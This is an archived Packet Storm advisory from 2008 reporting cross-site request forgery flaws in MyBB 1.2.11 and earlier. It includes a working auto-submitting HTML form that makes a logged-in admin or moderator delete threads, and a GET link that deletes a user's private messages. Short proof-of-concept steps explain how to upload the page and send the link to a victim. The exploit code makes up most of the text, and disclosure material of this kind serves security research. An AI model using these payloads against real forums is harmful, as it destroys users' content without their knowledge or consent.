mybb-xsrf.txt

2008-01-19T00:00:00
ID PACKETSTORM:62782
Type packetstorm
Reporter NBBN
Modified 2008-01-19T00:00:00

Description

                                        
                                            `####################################################  
Founded: 18, January 2008  
Founder: nbbn  
MyBB Version: 1.2.11 and lower  
Type: Multiple XSRF Vulnerabilities  
####################################################  
  
####1) Delete Threads XSRF Vulnerabilitie:  
  
<html>  
<head>  
</head>  
<body onLoad="javascript:document.formular.submit()">  
<form action="http://localhost/xampp/mybb/moderation.php" method="post"   
name="formular">  
<input type="hidden" name="action" value="do_multideletethreads" />  
<input type="hidden" name="fid" value="2" /> <!-- forumid -->  
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->  
<input type="submit" value="Delete Threads" />  
</form>  
  
  
</body>  
</html>   
  
###Poc:   
1. Create a .html file and copy the code into it.   
2. Upload the file and now send the link to an admin or moderator  
3. Done  
  
  
  
####2) Delete PM's XSRF Vuln:  
  
This one is only doing via GET and no question:   
http://localhost/xampp/mybb/private.php?action=delete&pmid=3  
  
  
###Poc: (An easy way):   
  
1. Send to a user this link:   
http://localhost/xampp/mybb/private.php?action=delete&pmid=3  
2. Done  
  
  
  
  
  
  
`